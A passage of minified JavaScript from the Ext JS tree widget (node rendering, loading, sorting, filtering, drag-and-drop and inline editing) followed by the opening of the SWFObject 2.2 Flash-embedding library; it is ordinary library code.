this.ctNode.style.display = "none"
}, animCollapse:function (b) {
var a = Ext.get(this.ctNode);
a.enableDisplayMode("block");
a.stopFx();
this.animating = true;
this.updateExpandIcon();
a.slideOut("t", {callback:function () {
this.animating = false;
Ext.callback(b)
}, scope:this, duration:this.node.ownerTree.duration || 0.25})
}, getContainer:function () {
return this.ctNode
}, getEl:function () {
return this.wrap
}, appendDDGhost:function (a) {
a.appendChild(this.elNode.cloneNode(true))
}, getDDRepairXY:function () {
return Ext.lib.Dom.getXY(this.iconNode)
}, onRender:function () {
this.render()
}, render:function (c) {
var e = this.node, b = e.attributes;
var d = e.parentNode ? e.parentNode.ui.getContainer() : e.ownerTree.innerCt.dom;
if (!this.rendered) {
this.rendered = true;
this.renderElements(e, b, d, c);
if (b.qtip) {
this.onTipChange(e, b.qtip, b.qtipTitle)
} else {
if (b.qtipCfg) {
b.qtipCfg.target = Ext.id(this.textNode);
Ext.QuickTips.register(b.qtipCfg)
}
}
this.initEvents();
if (!this.node.expanded) {
this.updateExpandIcon(true)
}
} else {
if (c === true) {
d.appendChild(this.wrap)
}
}
}, renderElements:function (e, k, j, l) {
this.indentMarkup = e.parentNode ? e.parentNode.ui.getChildIndent() : "";
var g = Ext.isBoolean(k.checked), b, c = this.getHref(k.href), d = ['<li class="x-tree-node"><div ext:tree-node-id="', e.id, '" class="x-tree-node-el x-tree-node-leaf x-unselectable ', k.cls, '" unselectable="on">', '<span class="x-tree-node-indent">', this.indentMarkup, "</span>", '<img alt="" src="', this.emptyIcon, '" class="x-tree-ec-icon x-tree-elbow" />', '<img alt="" src="', k.icon || this.emptyIcon, '" class="x-tree-node-icon', (k.icon ? " x-tree-node-inline-icon" : ""), (k.iconCls ? " " + k.iconCls : ""), '" unselectable="on" />', g ? ('<input class="x-tree-node-cb" type="checkbox" ' + (k.checked ? 'checked="checked" />' : "/>")) : "", '<a hidefocus="on" class="x-tree-node-anchor" href="', c, '" tabIndex="1" ', k.hrefTarget ? ' target="' + k.hrefTarget + '"' : "", '><span unselectable="on">', e.text, "</span></a></div>", '<ul class="x-tree-node-ct" style="display:none;"></ul>', "</li>"].join("");
if (l !== true && e.nextSibling && (b = e.nextSibling.ui.getEl())) {
this.wrap = Ext.DomHelper.insertHtml("beforeBegin", b, d)
} else {
this.wrap = Ext.DomHelper.insertHtml("beforeEnd", j, d)
}
this.elNode = this.wrap.childNodes[0];
this.ctNode = this.wrap.childNodes[1];
var i = this.elNode.childNodes;
this.indentNode = i[0];
this.ecNode = i[1];
this.iconNode = i[2];
var h = 3;
if (g) {
this.checkbox = i[3];
this.checkbox.defaultChecked = this.checkbox.checked;
h++
}
this.anchor = i[h];
this.textNode = i[h].firstChild
}, getHref:function (a) {
return Ext.isEmpty(a) ? (Ext.isGecko ? "" : "#") : a
}, getAnchor:function () {
return this.anchor
}, getTextEl:function () {
return this.textNode
}, getIconEl:function () {
return this.iconNode
}, isChecked:function () {
return this.checkbox ? this.checkbox.checked : false
}, updateExpandIcon:function () {
if (this.rendered) {
var g = this.node, d, c, a = g.isLast() ? "x-tree-elbow-end" : "x-tree-elbow", e = g.hasChildNodes();
if (e || g.attributes.expandable) {
if (g.expanded) {
a += "-minus";
d = "x-tree-node-collapsed";
c = "x-tree-node-expanded"
} else {
a += "-plus";
d = "x-tree-node-expanded";
c = "x-tree-node-collapsed"
}
if (this.wasLeaf) {
this.removeClass("x-tree-node-leaf");
this.wasLeaf = false
}
if (this.c1 != d || this.c2 != c) {
Ext.fly(this.elNode).replaceClass(d, c);
this.c1 = d;
this.c2 = c
}
} else {
if (!this.wasLeaf) {
Ext.fly(this.elNode).replaceClass("x-tree-node-expanded", "x-tree-node-collapsed");
delete this.c1;
delete this.c2;
this.wasLeaf = true
}
}
var b = "x-tree-ec-icon " + a;
if (this.ecc != b) {
this.ecNode.className = b;
this.ecc = b
}
}
}, onIdChange:function (a) {
if (this.rendered) {
this.elNode.setAttribute("ext:tree-node-id", a)
}
}, getChildIndent:function () {
if (!this.childIndent) {
var a = [], b = this.node;
while (b) {
if (!b.isRoot || (b.isRoot && b.ownerTree.rootVisible)) {
if (!b.isLast()) {
a.unshift('<img alt="" src="' + this.emptyIcon + '" class="x-tree-elbow-line" />')
} else {
a.unshift('<img alt="" src="' + this.emptyIcon + '" class="x-tree-icon" />')
}
}
b = b.parentNode
}
this.childIndent = a.join("")
}
return this.childIndent
}, renderIndent:function () {
if (this.rendered) {
var a = "", b = this.node.parentNode;
if (b) {
a = b.ui.getChildIndent()
}
if (this.indentMarkup != a) {
this.indentNode.innerHTML = a;
this.indentMarkup = a
}
this.updateExpandIcon()
}
}, destroy:function () {
if (this.elNode) {
Ext.dd.Registry.unregister(this.elNode.id)
}
Ext.each(["textnode", "anchor", "checkbox", "indentNode", "ecNode", "iconNode", "elNode", "ctNode", "wrap", "holder"], function (a) {
if (this[a]) {
Ext.fly(this[a]).remove();
delete this[a]
}
}, this);
delete this.node
}});
Ext.tree.RootTreeNodeUI = Ext.extend(Ext.tree.TreeNodeUI, {render:function () {
if (!this.rendered) {
var a = this.node.ownerTree.innerCt.dom;
this.node.expanded = true;
a.innerHTML = '<div class="x-tree-root-node"></div>';
this.wrap = this.ctNode = a.firstChild
}
}, collapse:Ext.emptyFn, expand:Ext.emptyFn});
Ext.tree.TreeLoader = function (a) {
this.baseParams = {};
Ext.apply(this, a);
this.addEvents("beforeload", "load", "loadexception");
Ext.tree.TreeLoader.superclass.constructor.call(this);
if (Ext.isString(this.paramOrder)) {
this.paramOrder = this.paramOrder.split(/[\s,|]/)
}
};
Ext.extend(Ext.tree.TreeLoader, Ext.util.Observable, {uiProviders:{}, clearOnLoad:true, paramOrder:undefined, paramsAsHash:false, nodeParameter:"node", directFn:undefined, load:function (b, c, a) {
if (this.clearOnLoad) {
while (b.firstChild) {
b.removeChild(b.firstChild)
}
}
if (this.doPreload(b)) {
this.runCallback(c, a || b, [b])
} else {
if (this.directFn || this.dataUrl || this.url) {
this.requestData(b, c, a || b)
}
}
}, doPreload:function (d) {
if (d.attributes.children) {
if (d.childNodes.length < 1) {
var c = d.attributes.children;
d.beginUpdate();
for (var b = 0, a = c.length; b < a; b++) {
var e = d.appendChild(this.createNode(c[b]));
if (this.preloadChildren) {
this.doPreload(e)
}
}
d.endUpdate()
}
return true
}
return false
}, getParams:function (g) {
var e = Ext.apply({}, this.baseParams), h = this.nodeParameter, b = this.paramOrder;
h && (e[h] = g.id);
if (this.directFn) {
var c = [g.id];
if (b) {
if (h && b.indexOf(h) > -1) {
c = []
}
for (var d = 0, a = b.length; d < a; d++) {
c.push(e[b[d]])
}
} else {
if (this.paramsAsHash) {
c = [e]
}
}
return c
} else {
return e
}
}, requestData:function (c, d, b) {
if (this.fireEvent("beforeload", this, c, d) !== false) {
if (this.directFn) {
var a = this.getParams(c);
a.push(this.processDirectResponse.createDelegate(this, [
{callback:d, node:c, scope:b}
], true));
this.directFn.apply(window, a)
} else {
this.transId = Ext.Ajax.request({method:this.requestMethod, url:this.dataUrl || this.url, success:this.handleResponse, failure:this.handleFailure, scope:this, argument:{callback:d, node:c, scope:b}, params:this.getParams(c)})
}
} else {
this.runCallback(d, b || c, [])
}
}, processDirectResponse:function (a, b, c) {
if (b.status) {
this.handleResponse({responseData:Ext.isArray(a) ? a : null, responseText:a, argument:c})
} else {
this.handleFailure({argument:c})
}
}, runCallback:function (a, c, b) {
if (Ext.isFunction(a)) {
a.apply(c, b)
}
}, isLoading:function () {
return !!this.transId
}, abort:function () {
if (this.isLoading()) {
Ext.Ajax.abort(this.transId)
}
}, createNode:function (attr) {
if (this.baseAttrs) {
Ext.applyIf(attr, this.baseAttrs)
}
if (this.applyLoader !== false && !attr.loader) {
attr.loader = this
}
if (Ext.isString(attr.uiProvider)) {
attr.uiProvider = this.uiProviders[attr.uiProvider] || eval(attr.uiProvider)
}
if (attr.nodeType) {
return new Ext.tree.TreePanel.nodeTypes[attr.nodeType](attr)
} else {
return attr.leaf ? new Ext.tree.TreeNode(attr) : new Ext.tree.AsyncTreeNode(attr)
}
}, processResponse:function (d, c, k, l) {
var m = d.responseText;
try {
var a = d.responseData || Ext.decode(m);
c.beginUpdate();
for (var g = 0, h = a.length; g < h; g++) {
var b = this.createNode(a[g]);
if (b) {
c.appendChild(b)
}
}
c.endUpdate();
this.runCallback(k, l || c, [c])
} catch (j) {
this.handleFailure(d)
}
}, handleResponse:function (c) {
this.transId = false;
var b = c.argument;
this.processResponse(c, b.node, b.callback, b.scope);
this.fireEvent("load", this, b.node, c)
}, handleFailure:function (c) {
this.transId = false;
var b = c.argument;
this.fireEvent("loadexception", this, b.node, c);
this.runCallback(b.callback, b.scope || b.node, [b.node])
}, destroy:function () {
this.abort();
this.purgeListeners()
}});
Ext.tree.TreeFilter = function (a, b) {
this.tree = a;
this.filtered = {};
Ext.apply(this, b)
};
Ext.tree.TreeFilter.prototype = {clearBlank:false, reverse:false, autoClear:false, remove:false, filter:function (d, a, b) {
a = a || "text";
var c;
if (typeof d == "string") {
var e = d.length;
if (e == 0 && this.clearBlank) {
this.clear();
return
}
d = d.toLowerCase();
c = function (g) {
return g.attributes[a].substr(0, e).toLowerCase() == d
}
} else {
if (d.exec) {
c = function (g) {
return d.test(g.attributes[a])
}
} else {
throw"Illegal filter type, must be string or regex"
}
}
this.filterBy(c, null, b)
}, filterBy:function (d, c, b) {
b = b || this.tree.root;
if (this.autoClear) {
this.clear()
}
var a = this.filtered, i = this.reverse;
var e = function (k) {
if (k == b) {
return true
}
if (a[k.id]) {
return false
}
var j = d.call(c || k, k);
if (!j || i) {
a[k.id] = k;
k.ui.hide();
return false
}
return true
};
b.cascade(e);
if (this.remove) {
for (var h in a) {
if (typeof h != "function") {
var g = a[h];
if (g && g.parentNode) {
g.parentNode.removeChild(g)
}
}
}
}
}, clear:function () {
var b = this.tree;
var a = this.filtered;
for (var d in a) {
if (typeof d != "function") {
var c = a[d];
if (c) {
c.ui.show()
}
}
}
this.filtered = {}
}};
Ext.tree.TreeSorter = Ext.extend(Object, {constructor:function (a, c) {
Ext.apply(this, c);
a.on({scope:this, beforechildrenrendered:this.doSort, append:this.updateSort, insert:this.updateSort, textchange:this.updateSortParent});
var e = this.dir && this.dir.toLowerCase() == "desc", i = this.property || "text", d = this.sortType, h = this.folderSort, b = this.caseSensitive === true, g = this.leafAttr || "leaf";
if (Ext.isString(d)) {
d = Ext.data.SortTypes[d]
}
this.sortFn = function (o, m) {
var k = o.attributes, j = m.attributes;
if (h) {
if (k[g] && !j[g]) {
return 1
}
if (!k[g] && j[g]) {
return -1
}
}
var n = k[i], l = j[i], q = d ? d(n) : (b ? n : n.toUpperCase()), p = d ? d(l) : (b ? l : l.toUpperCase());
if (q < p) {
return e ? 1 : -1
} else {
if (q > p) {
return e ? -1 : 1
}
}
return 0
}
}, doSort:function (a) {
a.sort(this.sortFn)
}, updateSort:function (a, b) {
if (b.childrenRendered) {
this.doSort.defer(1, this, [b])
}
}, updateSortParent:function (a) {
var b = a.parentNode;
if (b && b.childrenRendered) {
this.doSort.defer(1, this, [b])
}
}});
if (Ext.dd.DropZone) {
Ext.tree.TreeDropZone = function (a, b) {
this.allowParentInsert = b.allowParentInsert || false;
this.allowContainerDrop = b.allowContainerDrop || false;
this.appendOnly = b.appendOnly || false;
Ext.tree.TreeDropZone.superclass.constructor.call(this, a.getTreeEl(), b);
this.tree = a;
this.dragOverData = {};
this.lastInsertClass = "x-tree-no-status"
};
Ext.extend(Ext.tree.TreeDropZone, Ext.dd.DropZone, {ddGroup:"TreeDD", expandDelay:1000, expandNode:function (a) {
if (a.hasChildNodes() && !a.isExpanded()) {
a.expand(false, null, this.triggerCacheRefresh.createDelegate(this))
}
}, queueExpand:function (a) {
this.expandProcId = this.expandNode.defer(this.expandDelay, this, [a])
}, cancelExpand:function () {
if (this.expandProcId) {
clearTimeout(this.expandProcId);
this.expandProcId = false
}
}, isValidDropPoint:function (a, k, i, d, c) {
if (!a || !c) {
return false
}
var g = a.node;
var h = c.node;
if (!(g && g.isTarget && k)) {
return false
}
if (k == "append" && g.allowChildren === false) {
return false
}
if ((k == "above" || k == "below") && (g.parentNode && g.parentNode.allowChildren === false)) {
return false
}
if (h && (g == h || h.contains(g))) {
return false
}
var b = this.dragOverData;
b.tree = this.tree;
b.target = g;
b.data = c;
b.point = k;
b.source = i;
b.rawEvent = d;
b.dropNode = h;
b.cancel = false;
var j = this.tree.fireEvent("nodedragover", b);
return b.cancel === false && j !== false
}, getDropPoint:function (h, g, l) {
var m = g.node;
if (m.isRoot) {
return m.allowChildren !== false ? "append" : false
}
var c = g.ddel;
var o = Ext.lib.Dom.getY(c), j = o + c.offsetHeight;
var i = Ext.lib.Event.getPageY(h);
var k = m.allowChildren === false || m.isLeaf();
if (this.appendOnly || m.parentNode.allowChildren === false) {
return k ? false : "append"
}
var d = false;
if (!this.allowParentInsert) {
d = m.hasChildNodes() && m.isExpanded()
}
var a = (j - o) / (k ? 2 : 3);
if (i >= o && i < (o + a)) {
return"above"
} else {
if (!d && (k || i >= j - a && i <= j)) {
return"below"
} else {
return"append"
}
}
}, onNodeEnter:function (d, a, c, b) {
this.cancelExpand()
}, onContainerOver:function (a, c, b) {
if (this.allowContainerDrop && this.isValidDropPoint({ddel:this.tree.getRootNode().ui.elNode, node:this.tree.getRootNode()}, "append", a, c, b)) {
return this.dropAllowed
}
return this.dropNotAllowed
}, onNodeOver:function (b, i, h, g) {
var k = this.getDropPoint(h, b, i);
var c = b.node;
if (!this.expandProcId && k == "append" && c.hasChildNodes() && !b.node.isExpanded()) {
this.queueExpand(c)
} else {
if (k != "append") {
this.cancelExpand()
}
}
var d = this.dropNotAllowed;
if (this.isValidDropPoint(b, k, i, h, g)) {
if (k) {
var a = b.ddel;
var j;
if (k == "above") {
d = b.node.isFirst() ? "x-tree-drop-ok-above" : "x-tree-drop-ok-between";
j = "x-tree-drag-insert-above"
} else {
if (k == "below") {
d = b.node.isLast() ? "x-tree-drop-ok-below" : "x-tree-drop-ok-between";
j = "x-tree-drag-insert-below"
} else {
d = "x-tree-drop-ok-append";
j = "x-tree-drag-append"
}
}
if (this.lastInsertClass != j) {
Ext.fly(a).replaceClass(this.lastInsertClass, j);
this.lastInsertClass = j
}
}
}
return d
}, onNodeOut:function (d, a, c, b) {
this.cancelExpand();
this.removeDropIndicators(d)
}, onNodeDrop:function (i, b, h, d) {
var a = this.getDropPoint(h, i, b);
var g = i.node;
g.ui.startDrop();
if (!this.isValidDropPoint(i, a, b, h, d)) {
g.ui.endDrop();
return false
}
var c = d.node || (b.getTreeNode ? b.getTreeNode(d, g, a, h) : null);
return this.processDrop(g, d, a, b, h, c)
}, onContainerDrop:function (a, g, c) {
if (this.allowContainerDrop && this.isValidDropPoint({ddel:this.tree.getRootNode().ui.elNode, node:this.tree.getRootNode()}, "append", a, g, c)) {
var d = this.tree.getRootNode();
d.ui.startDrop();
var b = c.node || (a.getTreeNode ? a.getTreeNode(c, d, "append", g) : null);
return this.processDrop(d, c, "append", a, g, b)
}
return false
}, processDrop:function (j, h, b, a, i, d) {
var g = {tree:this.tree, target:j, data:h, point:b, source:a, rawEvent:i, dropNode:d, cancel:!d, dropStatus:false};
var c = this.tree.fireEvent("beforenodedrop", g);
if (c === false || g.cancel === true || !g.dropNode) {
j.ui.endDrop();
return g.dropStatus
}
j = g.target;
if (b == "append" && !j.isExpanded()) {
j.expand(false, null, function () {
this.completeDrop(g)
}.createDelegate(this))
} else {
this.completeDrop(g)
}
return true
}, completeDrop:function (h) {
var d = h.dropNode, e = h.point, c = h.target;
if (!Ext.isArray(d)) {
d = [d]
}
var g;
for (var b = 0, a = d.length; b < a; b++) {
g = d[b];
if (e == "above") {
c.parentNode.insertBefore(g, c)
} else {
if (e == "below") {
c.parentNode.insertBefore(g, c.nextSibling)
} else {
c.appendChild(g)
}
}
}
g.ui.focus();
if (Ext.enableFx && this.tree.hlDrop) {
g.ui.highlight()
}
c.ui.endDrop();
this.tree.fireEvent("nodedrop", h)
}, afterNodeMoved:function (a, c, g, d, b) {
if (Ext.enableFx && this.tree.hlDrop) {
b.ui.focus();
b.ui.highlight()
}
this.tree.fireEvent("nodedrop", this.tree, d, c, a, g)
}, getTree:function () {
return this.tree
}, removeDropIndicators:function (b) {
if (b && b.ddel) {
var a = b.ddel;
Ext.fly(a).removeClass(["x-tree-drag-insert-above", "x-tree-drag-insert-below", "x-tree-drag-append"]);
this.lastInsertClass = "_noclass"
}
}, beforeDragDrop:function (b, a, c) {
this.cancelExpand();
return true
}, afterRepair:function (a) {
if (a && Ext.enableFx) {
a.node.ui.highlight()
}
this.hideProxy()
}})
}
if (Ext.dd.DragZone) {
Ext.tree.TreeDragZone = function (a, b) {
Ext.tree.TreeDragZone.superclass.constructor.call(this, a.innerCt, b);
this.tree = a
};
Ext.extend(Ext.tree.TreeDragZone, Ext.dd.DragZone, {ddGroup:"TreeDD", onBeforeDrag:function (a, b) {
var c = a.node;
return c && c.draggable && !c.disabled
}, onInitDrag:function (b) {
var a = this.dragData;
this.tree.getSelectionModel().select(a.node);
this.tree.eventModel.disable();
this.proxy.update("");
a.node.ui.appendDDGhost(this.proxy.ghost.dom);
this.tree.fireEvent("startdrag", this.tree, a.node, b)
}, getRepairXY:function (b, a) {
return a.node.ui.getDDRepairXY()
}, onEndDrag:function (a, b) {
this.tree.eventModel.enable.defer(100, this.tree.eventModel);
this.tree.fireEvent("enddrag", this.tree, a.node, b)
}, onValidDrop:function (a, b, c) {
this.tree.fireEvent("dragdrop", this.tree, this.dragData.node, a, b);
this.hideProxy()
}, beforeInvalidDrop:function (a, c) {
var b = this.tree.getSelectionModel();
b.clearSelections();
b.select(this.dragData.node)
}, afterRepair:function () {
if (Ext.enableFx && this.tree.hlDrop) {
Ext.Element.fly(this.dragData.ddel).highlight(this.hlColor || "c3daf9")
}
this.dragging = false
}})
}
Ext.tree.TreeEditor = function (a, c, b) {
c = c || {};
var d = c.events ? c : new Ext.form.TextField(c);
Ext.tree.TreeEditor.superclass.constructor.call(this, d, b);
this.tree = a;
if (!a.rendered) {
a.on("render", this.initEditor, this)
} else {
this.initEditor(a)
}
};
Ext.extend(Ext.tree.TreeEditor, Ext.Editor, {alignment:"l-l", autoSize:false, hideEl:false, cls:"x-small-editor x-tree-editor", shim:false, shadow:"frame", maxWidth:250, editDelay:350, initEditor:function (a) {
a.on({scope:this, beforeclick:this.beforeNodeClick, dblclick:this.onNodeDblClick});
this.on({scope:this, complete:this.updateNode, beforestartedit:this.fitToTree, specialkey:this.onSpecialKey});
this.on("startedit", this.bindScroll, this, {delay:10})
}, fitToTree:function (b, c) {
var e = this.tree.getTreeEl().dom, d = c.dom;
if (e.scrollLeft > d.offsetLeft) {
e.scrollLeft = d.offsetLeft
}
var a = Math.min(this.maxWidth, (e.clientWidth > 20 ? e.clientWidth : e.offsetWidth) - Math.max(0, d.offsetLeft - e.scrollLeft) - 5);
this.setSize(a, "")
}, triggerEdit:function (a, c) {
this.completeEdit();
if (a.attributes.editable !== false) {
this.editNode = a;
if (this.tree.autoScroll) {
Ext.fly(a.ui.getEl()).scrollIntoView(this.tree.body)
}
var b = a.text || "";
if (!Ext.isGecko && Ext.isEmpty(a.text)) {
a.setText(" ")
}
this.autoEditTimer = this.startEdit.defer(this.editDelay, this, [a.ui.textNode, b]);
return false
}
}, bindScroll:function () {
this.tree.getTreeEl().on("scroll", this.cancelEdit, this)
}, beforeNodeClick:function (a, b) {
clearTimeout(this.autoEditTimer);
if (this.tree.getSelectionModel().isSelected(a)) {
b.stopEvent();
return this.triggerEdit(a)
}
}, onNodeDblClick:function (a, b) {
clearTimeout(this.autoEditTimer)
}, updateNode:function (a, b) {
this.tree.getTreeEl().un("scroll", this.cancelEdit, this);
this.editNode.setText(b)
}, onHide:function () {
Ext.tree.TreeEditor.superclass.onHide.call(this);
if (this.editNode) {
this.editNode.ui.focus.defer(50, this.editNode.ui)
}
}, onSpecialKey:function (c, b) {
var a = b.getKey();
if (a == b.ESC) {
b.stopEvent();
this.cancelEdit()
} else {
if (a == b.ENTER && !b.hasModifier()) {
b.stopEvent();
this.completeEdit()
}
}
}, onDestroy:function () {
clearTimeout(this.autoEditTimer);
Ext.tree.TreeEditor.superclass.onDestroy.call(this);
var a = this.tree;
a.un("beforeclick", this.beforeNodeClick, this);
a.un("dblclick", this.onNodeDblClick, this)
}});
/* SWFObject v2.2 <http://code.google.com/p/swfobject/>
is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/
var swfobject = function () {
var E = "undefined", s = "object", T = "Shockwave Flash", X = "ShockwaveFlash.ShockwaveFlash", r = "application/x-shockwave-flash", S = "SWFObjectExprInst", y = "onreadystatechange", P = window, k = document, u = navigator, U = false, V = [i], p = [], O = [], J = [], m, R, F, C, K = false, a = false, o, H, n = true, N = function () {
var ab = typeof k.getElementById != E && typeof k.getElementsByTagName != E && typeof k.createElement != E, ai = u.userAgent.toLowerCase(), Z = u.platform.toLowerCase(), af = Z ? (/win/).test(Z) : /win/.test(ai), ad = Z ? (/mac/).test(Z) : /mac/.test(ai), ag = /webkit/.test(ai) ? parseFloat(ai.replace(/^.*webkit\/(\d+(\.\d+)?).*$/, "$1")) : false, Y = !+"\v1", ah = [0, 0, 0], ac = null;
if (typeof u.plugins != E && typeof u.plugins[T] == s) {
ac = u.plugins[T].description;
if (ac && !(typeof u.mimeTypes != E && u.mimeTypes[r] && !u.mimeTypes[r].enabledPlugin)) {
U = true;
Y = false;
ac = ac.replace(/^.*\s+(\S+\s+\S+$)/, "$1");
ah[0] = parseInt(ac.replace(/^(.*)\..*$/, "$1"), 10);
ah[1] = parseInt(ac.replace(/^.*\.(.*)\s.*$/, "$1"), 10);
ah[2] = /[a-zA-Z]/.test(ac) ? parseInt(ac.replace(/^.*[a-zA-Z]+(.*)$/, "$1"), 10) : 0
}
} else {
if (typeof P.ActiveXObject != E) {
try {
var ae = new ActiveXObject(X);
if (ae) {
ac = ae.GetVariable("$version");
if (ac) {
Y = true;
ac = ac.split(" ")[1].split(",");
ah = [parseInt(ac[0], 10), parseInt(ac[1], 10), parseInt(ac[2], 10)]
}
}
} catch (aa) {
}
}
}
return{w3:ab, pv:ah, wk:ag, ie:Y, win:af, mac:ad}
}(), l = function () {
if (!N.w3) {
return
}
if ((typeof k.readyState != E && k.readyState == "complete") || (typeof k.readyState == E && (k.getElementsByTagName("body")[0] || k.body))) {
g()
}
if (!K) {
if (typeof k.addEventListener != E) {
k.addEventListener("DOMContentLoaded", g, false)
}
if (N.ie && N.win) {
k.attachEvent(y, function () {
if (k.readyState == "complete") {
k.detachEvent(y, arguments.callee);
g()
}
});
if (P == top) {
(function () {
if (K) {
return
}
try {
k.documentElement.doScroll("left")
} catch (Y) {
setTimeout(arguments.callee, 0);
return
}
g()
})()
}
}
if (N.wk) {
(function () {
if (K) {
return
}
if (!(/loaded|complete/).test(k.readyState)) {
setTimeout(arguments.callee, 0);
return
}
g()
})()
}
t(g)
}
}();
function g() {
if (K) {
return
}
try {
var aa = k.getElementsByTagName("body")[0].appendChild(D("span"));
aa.parentNode.removeChild(aa)
} catch (ab) {
return
}
K = true;
var Y = V.length;
for (var Z = 0; Z < Y; Z++) {
V[Z]()
}
}
function L(Y) {
if (K) {
Y()
} else {
V[V.length] = Y
}
}
function t(Z) {
if (typeof P.addEventListener != E) {
P.addEventListener("load", Z, false)
} else {
if (typeof k.addEventListener != E) {
k.addEventListener("load", Z, false)
} else {
if (typeof P.attachEvent != E) {
j(P, "onload", Z)
} else {
if (typeof P.onload == "function") {
var Y = P.onload;
P.onload = function () {
Y();
Z()
}
} else {
P.onload = Z
}
}
}
}
}
function i() {
if (U) {
W()
} else {
I()
}
}
function W() {
var Y = k.getElementsByTagName("body")[0];
var ab = D(s);
ab.setAttribute("type", r);
var aa = Y.appendChild(ab);
if (aa) {
var Z = 0;
(function () {
if (typeof aa.GetVariable != E) {
var ac = aa.GetVariable("$version");
if (ac) {
ac = ac.split(" ")[1].split(",");
N.pv = [parseInt(ac[0], 10), parseInt(ac[1], 10), parseInt(ac[2], 10)]
}
} else {
if (Z < 10) {
Z++;
setTimeout(arguments.callee, 10);
return
}
}
Y.removeChild(ab);
aa = null;
I()
})()
} else {
I()
}
}
function I() {
var ah = p.length;
if (ah > 0) {
for (var ag = 0; ag < ah; ag++) {
var Z = p[ag].id;
var ac = p[ag].callbackFn;
var ab = {success:false, id:Z};
if (N.pv[0] > 0) {
var af = c(Z);
if (af) {
if (G(p[ag].swfVersion) && !(N.wk && N.wk < 312)) {
x(Z, true);
if (ac) {
ab.success = true;
ab.ref = A(Z);
ac(ab)
}
} else {
if (p[ag].expressInstall && B()) {
var aj = {};
aj.data = p[ag].expressInstall;
aj.width = af.getAttribute("width") || "0";
aj.height = af.getAttribute("height") || "0";
if (af.getAttribute("class")) {
aj.styleclass = af.getAttribute("class")
}
if (af.getAttribute("align")) {
aj.align = af.getAttribute("align")
}
var ai = {};
var Y = af.getElementsByTagName("param");
var ad = Y.length;
for (var ae = 0; ae < ad; ae++) {
if (Y[ae].getAttribute("name").toLowerCase() != "movie") {
ai[Y[ae].getAttribute("name")] = Y[ae].getAttribute("value")
}
}
Q(aj, ai, Z, ac)
} else {
q(af);
if (ac) {
ac(ab)
}
}
}
}
} else {
x(Z, true);
if (ac) {
var aa = A(Z);
if (aa && typeof aa.SetVariable != E) {
ab.success = true;
ab.ref = aa
}
ac(ab)
}
}
}
}
}
function A(ab) {
var Y = null;
var Z = c(ab);
if (Z && Z.nodeName == "OBJECT") {
if (typeof Z.SetVariable != E) {
Y = Z
} else {
var aa = Z.getElementsByTagName(s)[0];
if (aa) {
Y = aa
}
}
}
return Y
}
function B() {
return !a && G("6.0.65") && (N.win || N.mac) && !(N.wk && N.wk < 312)
}
function Q(ab, ac, Y, aa) {
a = true;
F = aa || null;
C = {success:false, id:Y};
var af = c(Y);
if (af) {
if (af.nodeName == "OBJECT") {
m = h(af);
R = null
} else {
m = af;
R = Y
}
ab.id = S;
if (typeof ab.width == E || (!(/%$/).test(ab.width) && parseInt(ab.width, 10) < 310)) {
ab.width = "310"
}
if (typeof ab.height == E || (!(/%$/).test(ab.height) && parseInt(ab.height, 10) < 137)) {
ab.height = "137"
}
k.title = k.title.slice(0, 47) + " - Flash Player Installation";
var ae = N.ie && N.win ? "ActiveX" : "PlugIn", ad = "MMredirectURL=" + P.location.toString().replace(/&/g, "%26") + "&MMplayerType=" + ae + "&MMdoctitle=" + k.title;
if (typeof ac.flashvars != E) {
ac.flashvars += "&" + ad
} else {
ac.flashvars = ad
}
if (N.ie && N.win && af.readyState != 4) {
var Z = D("div");
Y += "SWFObjectNew";
Z.setAttribute("id", Y);
af.parentNode.insertBefore(Z, af);
af.style.display = "none";
(function () {
if (af.readyState == 4) {
af.parentNode.removeChild(af)
} else {
setTimeout(arguments.callee, 10)
}
})()
}
v(ab, ac, Y)
}
}
function q(Z) {
if (N.ie && N.win && Z.readyState != 4) {
var Y = D("div");
Z.parentNode.insertBefore(Y, Z);
Y.parentNode.replaceChild(h(Z), Y);
Z.style.display = "none";
(function () {
if (Z.readyState == 4) {
Z.parentNode.removeChild(Z)
} else {
setTimeout(arguments.callee, 10)
}
})()
} else {
Z.parentNode.replaceChild(h(Z), Z)
}
}
function h(ad) {
var ab = D("div");
if (N.win && N.ie) {
ab.innerHTML = ad.innerHTML
} else {
var Z = ad.getElementsByTagName(s)[0];
if (Z) {
var ae = Z.childNodes;
if (ae) {
var Y = ae.length;
for (var aa = 0; aa < Y; aa++) {
if (!(ae[aa].nodeType == 1 && ae[aa].nodeName == "PARAM") && !(ae[aa].nodeType == 8)) {
ab.appendChild(ae[aa].cloneNode(true))
}
}
}
}
}
return ab
}
function v(aj, ah, Z) {
var Y, ab = c(Z);
if (N.wk && N.wk < 312) {
return Y
}
if (ab) {
if (typeof aj.id == E) {
aj.id = Z
}
if (N.ie && N.win) {
var ai = "";
for (var af in aj) {
if (aj[af] != Object.prototype[af]) {
if (af.toLowerCase() == "data") {
ah.movie = aj[af]
} else {
if (af.toLowerCase() == "styleclass") {
ai += ' class="' + aj[af] + '"'
} else {
if (af.toLowerCase() != "classid") {
ai += " " + af + '="' + aj[af] + '"'
}
}
}
}
}
var ag = "";
for (var ae in ah) {
if (ah[ae] != Object.prototype[ae]) {
ag += '<param name="' + ae + '" value="' + ah[ae] + '" />'
}
}
ab.outerHTML = '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"' + ai + ">" + ag + "</object>";
O[O.length] = aj.id;
Y = c(aj.id)
} else {
var aa = D(s);
aa.setAttribute("type", r);
for (var ad in aj) {
if (aj[ad] != Object.prototype[ad]) {
if (ad.toLowerCase() == "styleclass") {
aa.setAttribute("class", aj[ad])
} else {
if (ad.toLowerCase() != "classid") {
aa.setAttribute(ad, aj[ad])
}
}
}
}
for (var ac in ah) {
if (ah[ac] != Object.prototype[ac] && ac.toLowerCase() != "movie") {
e(aa, ac, ah[ac])
}
}
ab.parentNode.replaceChild(aa, ab);
Y = aa
}
}
return Y
}
function e(aa, Y, Z) {
var ab = D("param");
ab.setAttribute("name", Y);
ab.setAttribute("value", Z);
aa.appendChild(ab)
}
function z(Z) {
var Y = c(Z);
if (Y && Y.nodeName == "OBJECT") {
if (N.ie && N.win) {
Y.style.display = "none";
(function () {
if (Y.readyState == 4) {
b(Z)
} else {
setTimeout(arguments.callee, 10)
}
})()
} else {
Y.parentNode.removeChild(Y)
}
}
}
function b(aa) {
var Z = c(aa);
if (Z) {
for (var Y in Z) {
if (typeof Z[Y] == "function") {
Z[Y] = null
}
}
Z.parentNode.removeChild(Z)
}
}
function c(aa) {
var Y = null;
try {
